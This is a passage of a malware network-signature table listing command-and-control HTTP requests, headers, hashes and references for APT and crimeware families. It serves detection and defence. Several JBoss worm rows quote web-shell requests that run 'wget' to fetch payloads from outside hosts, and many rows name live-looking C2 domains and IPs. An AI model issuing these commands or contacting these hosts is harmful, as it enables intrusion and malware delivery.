221 | 2013-04-28 | CRIME | IRCbot | GET | /check_ver.php?version=1.09 | /check_ver.php | /check_ver.php?version=1.09 User-Agent: - Host: rc.rizalof.com Cache-Control: no-cache HTTP/1.0 200 (OK) | - | 6716a417f82ccedf0f860b735ac0187 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2013-04 | |||||
222 | 2013-04-28 | APT | IXESHE | GET | /AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/ wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A | /AWS | User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: dot.faawan.com:443 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) | 443 | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | ||||||
223 | 2013-04-28 | APT | IXESHE AES | GET | /AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M | /AES | /AES210001 129016878.jsp?UrFwUIO3h7ofgwQInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M User-Agent: Mozilla/4.O (compatible; MSIE 5.01; Windows NT 5.0) Host: 140.119.44.181 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
224 | 2013-04-28 | CRIME | JBOSS worm | GET | /zecmd/zecmd.jsp?comment=perl+lindb.pl | /zecmd.jsp?comment= | http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/ | ||||||||||
225 | 2013-04-28 | CRIME | JBOSS worm | GET | /idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz | idssvc.jsp?comment= | |||||||||||
226 | 2013-04-28 | CRIME | JBOSS worm | GET | /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz | idssvc.jsp?comment= | |||||||||||
227 | 2013-04-28 | APT | Letsgo / TabMsgSQL | GET | /indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regcode%20=%20'IXLCGIXELZ' | /indexbak.asp?rands= | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: <hostname> Connection: Keep-Alive | Mozilla/4.0 (compatible; ) | TabMsgSQL crafts raw SQL queries and passes these as encoded URL parameters when communicating with the C2 server. Every HTTP URI generated by the malware will have the “rands=” URL parameter | 052ec04866e4a67f31845d656531830d | http://intelreport.mandiant.com/ | 2011-06 | |||||
228 | 2013-04-28 | APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20 from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc | /1.asp?rands= | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: 202.105.39.39 Connection: Keep-Alive Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN | Mozilla/4.0 (compatible; ) | After the victim is successfully registered, it sends queries to the database for messages for its ID (in this case the assigned ID of the victim is 198) | 052ec04866e4a67f31845d656531830d | http://www.matasano.com/research/PEST-CONTROL.pdf | 2011-06 | |||||
229 | 2013-04-28 | APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20 (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20 ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54', '2011-06-08%2013:45:54','NMQVPTXFBH') | /1.asp?rands= | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: 202.105.39.39 Connection: Keep-Alive Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN | Mozilla/4.0 (compatible; ) | When this Trojan is first executed it sends a SQL query to the database to see if it has already been registered there. If not, it will send a request to do so | 052ec04866e4a67f31845d656531830d | http://www.matasano.com/research/PEST-CONTROL.pdf | 2011-06 | |||||
230 | 2013-04-28 | APT | Letsgo / TabMsgSQL downloader | GET | /new/iistart.html | /iistart.html | Accept: / User-Agent: lt-764-238+Windows+NT+5.171 Host: 122.147.13.8 | lt-764-238+Windows+NT+5.171 | 2b1c03b4e34a123e5317182e6159e38a | http://www.cyberengineeringservices.com/trojan-letsgo-analysis/ | 2011-06 | ||||||
231 | 2013-04-28 | APT | Likseput | GET | /index.html | /index.html | User-Agent: 5.1 10:59 DELLXT\Laura Host: nasa.usnewssite.com Cache-Control: no-cache | 5.1 10:59 <PC-Name>\<Username> | E019E37F19040059AB5662563F06B609 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-08 | |||||
232 | 2013-04-28 | APT | Lingbo (?) | POST | /windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM >QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb | /search% | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322) Host: globalizationinteriorgov.net Content-Length: 14277 Connection: Keep-Alive Cache-Control: no-cache 2.r.)... ‘.5.. ,—. .i.-..dq...R.’3.w....>N.B.—z. .e90)rw.b-b9QGhT. .. .3. .n.>j.hLe | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322) | 20DD4DD02C2B17A40B26843AA0C660F6 | http://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html | 2011-01 | ||||||
233 | 2013-04-28 | APT | Luckycat - WIMMIE | POST | /count/count.php?m=c&n=[HOSTNAME]_ | /count.php?m=c&n= | Accept: / UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: [HOSTNAME] Content-Length: 0 Connection: Keep-Alive Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | WIMMIE malware does not leave much of a network fingerprint. However, the following is an identifiable HTTP C&C communication fingerprint: count.php?m=c&n=[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@. This format can also be seen in the URL inside the script when /namespace:\\root\subscription path __eventconsumer is typed in the command line for WMI. | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf | 2012 | ||||||
234 | 2013-04-28 | CRIME | Medfos | GET | /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww== | /id= | Host: www.microsoft.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 Cache-Control: no-cache | Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 | 0512E73000BCCCE5AFD2E9329972208A | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 4/27/2013 | ||||||
235 | 2013-04-28 | APT | MiniASP | GET | /device_<decoded ID string>asp?device_t=<random 10 digits>&key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters> | /device_ | Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-gb User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: <decoded_server> | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | MINIASP is a backdoor that retrieves encoded commands over HTTP. If the malware has not been executed with any parameters, it decodes its ID and server strings. The malware issues a request to the decoded server name | e476e4a24f8b4ff4c8a0b260aa35fc9f | http://intelreport.mandiant.com/ | 2012-11 | |||||
236 | 2013-04-28 | APT | MiniASP | GET | /record.asp?device_t=<random 10 digits> &key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>&result=<URLencoded result data> | /record.asp?device_t= | Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml,image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-gb User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: <decoded_server> | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | Once the malware has completed processing the commands received, it sends a request | e476e4a24f8b4ff4c8a0b260aa35fc9f | http://intelreport.mandiant.com/ | 2012-11 | |||||
237 | 2013-04-28 | APT | Miniduke | POST | /index.php | /index.php | Content-Type: multipart/form-data; boundary=----------------------- 2856073314169 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; .NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2) Host: bolsilloner.es Content-Length: 347 Connection: Keep-Alive Cache-Control: no-cache ----------------------------2856073314169 Content-Disposition: form-data; name=”fname” ibarext32. blb ----------------------------2856073314169 Content-Disposition: form-data; nanie”i” b3cdbdo92e2ce ----------------------------I 2856073314169 Content-Disposition: form-data; name=’c’ 2 | Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; . NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2) | http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/its-a-kind-of-magic-1.html http://www.securelist.com/en/blog/208194129/The_MiniDuke_Mystery_PDF_0_day_Government_Spy_Assembler_0x29A_Micro_Backdoor | 2013-02 | |||||||
238 | 2013-04-28 | APT | Mirage | POST | /result?hl=en&meta=mdlyorvkildpiicqqownoatgvow | /result?hl=en | Accept: / Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Connection: close Content-Length: 293 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Pragma: no-cache Host: (C&C):443 Mtdkj..21:DFkJL$KO #S%&t+,’r.ABCD_abcde(ghijklmnopqrstuvwxyz( I 9142@alv | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | 443 | phone-home request | http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/ | ||||||
239 | 2013-04-28 | APT | Mirage - later var | GET | /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg | /search?hl=en&q= | ASH-1.3: 1 | Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) | Instead of the word "Mirage" used in earlier variants, later variants use the phrase "Neo, welcome to the desert of the real" | http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/ | 2012-09 | ||||||
240 | 2013-04-28 | CRIME | Money loader | GET | <p>/get_xml?file_id=25227372 <p>/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 | /get_xml?file_id= | Accept: / User-Agent: tiny-dl/nix Host: takeinfo.ru ============ /dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 User-Agent: tiny-dl Host: binupdate.mail.ru Cache-Control: no-cache | tiny-dl/nix tiny-dl | 4e801b46068b31b82dac65885a58ed9e | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2013-04 | |||||
241 | 2013-04-28 | APT | Mongal | GET | /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 61.178.77.169:84 Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) | C6F01A6AD70DA7A554D48BDBF7C7E065 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2013-01 | ||||||
242 | 2013-04-28 | APT | Murcy | GET | /150828 | /150828 | Connection: Keep-Alive Accept: / Host: path.alyac.org User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Extra-Data-Bind: DE6A34D80D43B930 Extra-Data-Space: 65536 Extra-Data: 4ZFNSAAEAAh2AoNAAAAAAgRCHACwoSogAjKhCCf/HA AVNAAAAeAAAgDBAAABIAAAs0kAAUAAAAQAAAAAooAA AIAAAAATAAAAKCAAAgKAAAgqAAAA4CAAAgNAAAAOAM DA3AgQAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxAEEAzAQOAADA5AAMAkDAwAgNAkDAxAAAAMFAlB gcAYHApBwYAUGAgAAUAEGAjBwaAACAzAAAAAAATBQW AMFAUBQRA0EAAAwVA8EAXBQLAUEA4AQRAxxxxxxxxx xxxxxxxxxx2AAAAAAA Cache-Control: no-cache Pragma: no-cache Content-Length: 0 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | The path in the HTTP requests is the computer’s tick count (i.e. the number of milliseconds since the system was started). The requests from the victim occurred approximately every 11 seconds when the computer was turned on. Accordingly, the number in the URI increased by approximately 11000 each request. | http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf | 2012-02 | ||||||
243 | 2013-04-28 | APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT | /nettraveler.asp?action=getcmd&hostid= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: en-us Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.gami1.com Cache-Control: no-cache Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | continued traffic after the initial callback | 1f26e5f9b44c28b37b6cd13283838366 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2013-01 | ||||
244 | 2013-04-28 | APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX <very long string> UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt | /nettraveler.asp?hostid= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: en-us Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.gami1.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | initial call back | 1f26e5f9b44c28b37b6cd13283838366 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2013-01 | ||||
245 | 2013-04-28 | APT | Netravler | GET | <p>/nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end <p>/nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc&hostip=10.12.0.23&filename= travlerbackinfo-2012-1- | /nettraveler.asp?hostid= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: en-us Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.vipyandex.com Connection: Keep-Alive Cookie: ASPSESSIONIDCSBQCTCA=EFKILJMDFNHODIDELKHIFDMH HTTP/1.1 200 OK Connection: close Date: Sun, 07 Oct 2012 03:37:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 10 Content-Type: text/html Cache-control: private Success:88 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | DA5832657877514306EDD211DEF61AFE | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-10 | |||||
246 | 2013-04-28 | APT | NfLog | GET | /IElog/TestURL.asp HTTP/1.0 | /IElog/ | /IElog/TestURL.asp HTTP/1.0 User-Agent: www Host: www.aviraco.com Content-Length: 10 Pragma: no-cache 1234567890 | www | D4859FC951652B3C9657F8621D4DB625 | http://contagiodump.blogspot.com/2012/02/feb-9-cve-2011-1980-msoffice-dll.html | 2012-02 | ||||||
247 | 2013-04-28 | APT | NfLog | POST | /NfLog/Nfile.asp | /NfLog/ | /NfLog/Nfile.asp Accept: / User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) Host: www.mlitjcab.com Content-Length: 0 Cache-Control: no-cache | Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) | 0612B3138179852A416379B3E85742EA | http://contagiodump.blogspot.com/2012/08/cve-2012-0158-generated-8861-password.html | 2012-08 | ||||||
248 | 2013-04-28 | APT | NTESSESS | GET | /6K8gL8.html | /6K8gL8.html | /6K8gL8.html Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Cache-Control: no-cache Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 69.39.133.114 Connection: Keep-Alive Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 692cb0fca66738055396e1e1c8f0d52c | http://www.cyberengineeringservices.com/malware-obfuscated-within-png-files-sample-2-2/ | 2011-05 | ||||||
249 | 2013-04-28 | APT | PNG trojan | GET | /index.htm | /index.htm | /index.htm User-Agent: Windows+NT+5.1 Host: www.muckleshoot.nsn.us Cache-Control: no-cache The content of index.htm is parsed for the HTML comment tag: <!--...--> | Windows+NT+5.1 | 1efc0c20b0445bc081890f16f59e672b | http://www.cyberengineeringservices.com/the-png-trojan-%E2%80%93-acrord32-exe/ | 2011-05 | ||||||
250 | 2013-04-28 | APT | Poison Ivy | GET | 256 bytes of seemingly random data after a successful TCP handshake, then 48 byte “keep-alive” requests | http://contagiodump.blogspot.com/2012/04/poisonivy-traffic.html | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||||
251 | 2013-04-28 | APT | RedOctober AuthInfo | POST | http://%s:%s%s | Host: %s:%s Pragma: no-cache Cache-Control: no-cache Content-length: %u Content-Type: application/x-www-form-urlencoded POSTDATA | Authinfo 2nd stage | 793c82efc65a43ed249a45ec7c69a388 428de53f1a1eaa040847b6456b7e5369 | http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack | ||||||||
252 | 2013-04-28 | APT | RedOctober Sysinfo | POST | /cgi-bin/nt/sk | /cgi-bin/nt/sk | Host: %CnC% Connection: close Content-Length: %d\r\n\r\n DATA | Sysinfo 2nd stage | e36b94cd608e3dfdf82b4e64d1e40681 a2fe73d01fd766584a0c54c971a0448a | http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack | 2013-01 | ||||||
253 | 2013-04-28 | APT | RegSubDat | POST | /5501000000/log | /5501000000/log | Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 Host: ibm.asia-online.us:80 Content-Length: 90 Proxy-Connection: Keep-Alive | Mozilla/4.0 | c5860171f919761db9ee78ef3dac5ab4 | http://www.cyberengineeringservices.com/india-united-states-naval-cooperation-doc-analysis/ | 2012-12 | ||||||
254 | 2013-04-28 | APT | Sanny / Win32.Daws | POST | /write.php | /write.php | Host: board.nboard.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: EUC-KR,utf-8;q=0.7,;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://board.nboard.net/form.php?db=kbaksan_1 Content-Type: application/x-www-form-urlencoded Content-Length: 5248 [snip] db=kbaksan_1&ch=19&name=zz.|zzz&email=&pw=1917qaz&ulink=&title=DELLXT_(0_0)&e5=0&e6=&e7=&html=2&text=fndpoGJ- nGkfaKu7KKsxvv&tlink=HTTP/1.1 302 Found | Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 | b00ae5492ce724fd01b926a7f7cb3e66 | http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html | http://bit.ly/aptpcaps | 2012-12 | |||||
255 | 2013-04-28 | APT | Seasalt | GET | /postinfo.html | /postinfo.html | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM Host: ubuntuguru.strangled.net Connection: Close | Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM | When SEASALT is first installed, it attempts to retrieve a hard-coded URL but the received data is never checked or processed. The malware uses a hard-coded HTTP user-agent string, as shown in an example HTTP request | f0726aadcf5d66daf528f79ba8507113 | http://intelreport.mandiant.com/ | 2012-09 | |||||
256 | 2013-04-28 | APT | Sofacy | POST | /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 | /cgi-bin/brvc.cgi? | /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 User-Agent: MSIE 8.0 Host: 200.106.145.122 Content-Length: 6 Cache-Control: no-cache | MSIE 8.0 | a2a188cbf74c1be52681f998f8e9b6b5 1DA0C961C7AF849071AB86CAAF846B2A | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-10 | |||||
257 | 2013-04-28 | APT | Sofacy | POST | /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS | /cgi-bin/qfa.cgi? | /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS Referer: /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS User-Agent: MSIE 8.0 Host: 200.106.145.122 Cache-Control: no-cache | MSIE 8.0 | 1DA0C961C7AF849071AB86CAAF846B2A | http://bit.ly/aptpcaps | 2012-10 | ||||||
258 | 2013-04-28 | CRIME | Srizbi | GET | /cb_4.exe | /cb_4.exe | /cb_4.exe Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: spacestorminc.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 06E589B4E3AB93C6B16389DD79549A7A | http://www.fireeye.com/blog/technical/botnet-activities-research/2008/08/srizbi-alongwit.html | 2008-08 | ||||||
259 | 2013-04-28 | CRIME | Stabuniq | POST | /rssnews.php | /rssnews.php | /rssnews.php Content-Type: application/x-www-form-urlencoded Host: benhomelandefit.com Content-Length: 1093 Cache-Control: no-cache id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=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&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1 | F31B797831B36A4877AA0FD173A7A4A2 | http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html | 12/24/2012 | |||||||
260 | 2013-04-28 | APT | Sykipot / Wyksol | GET | /kys_allowget.asp?namegetkys.kys | /namegetkys.kys | /kys_allowget.asp?namegetkys.kys Accept: / User-Agent: HTTP-GET Host: www.top10member.com Cache-Control: no-cache | http://www.sans.org/reading_room/whitepapers/malicious/detaile http://blog.trendmicro.com/the-sykipot-campaign/ | 2012 | ||||||||
261 | 2013-04-28 | APT | Taidoor | GET | /apzsr.php?id=021793111D309GE67E | /apzsr.php?id= | /apzsr.php?id=021793111D309GE67E User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 211.234.117.141:443 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 443 | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html | http://bit.ly/aptpcaps | 2012 | |||||
262 | 2013-04-28 | APT | Tarsip Eclipse | GET | /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 | /redir?di= | /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 UA-CPU: x86 Accept: text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1 Accept-Language: en-us Accept-Encoding: gzip;q=0.8, deflate;q=0.5 Cookie: CLIP=<encoded host information> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: <C2 server address> Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | The TARSIP-ECLIPSE backdoor communicates with the C2 server over SSL on port 443 even if the TLS option is not set. Once an SSL session has been established with the server, the malware will make a request. To make the request, the malware will choose a random URI from the following list: /blg7_8newtpl/image/7/7_12/images/redir? /widget/widgets/wgt_static/flink? /s/lcms_/IDD/t/c.gif? /status/MutiqueryVP/main? /api/get_attention_num/adfshow? /uc/myshow/blog/misc/gif/show.asp? /A2/front/lm/mini/noborder/? /sub/cgi-bin/gmes? /sheq/por/blomofun/bord.aspx? /combo.action/bin/load.swf? /pp/core/cgi/wor.asp? /loa/database3/sun.html? | 123505024F9E5FF74CB6AA67D7FCC392 | http://intelreport.mandiant.com/ | http://bit.ly/crimepcaps | 2012-04 | ||||
263 | 2013-04-28 | APT | Tarsip Moon | GET | /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 | /2055?meth=gc&tid= | UA-CPU: x86 Accept: text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1 Accept-Language: en-us Accept-Encoding: gzip;q=0.8, deflate;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Host: <hostname> | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) | The malware sends an initial beacon HTTP request (SSL encrypted) to /images/icons/<rand_1000_5999> where the URL parameter “inif” contains a single-byte XOR’d string that is Base64 encoded. | 95f25d3afc5370f5d9fd8e65c17d3599 | http://intelreport.mandiant.com/ | 2011-10 | |||||
264 | 2013-04-28 | CRIME | Tbot tor | n | ...........P.......+.l.....U..w_..?z5.U.!....:. ...9.8.....5.........3.2............./......... ..... .....Y.........www.fjpv.com......... .4.2................... ..... .........................#. | FC7C3E087789824F34A9309DA2388CE5 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | ||||||||||
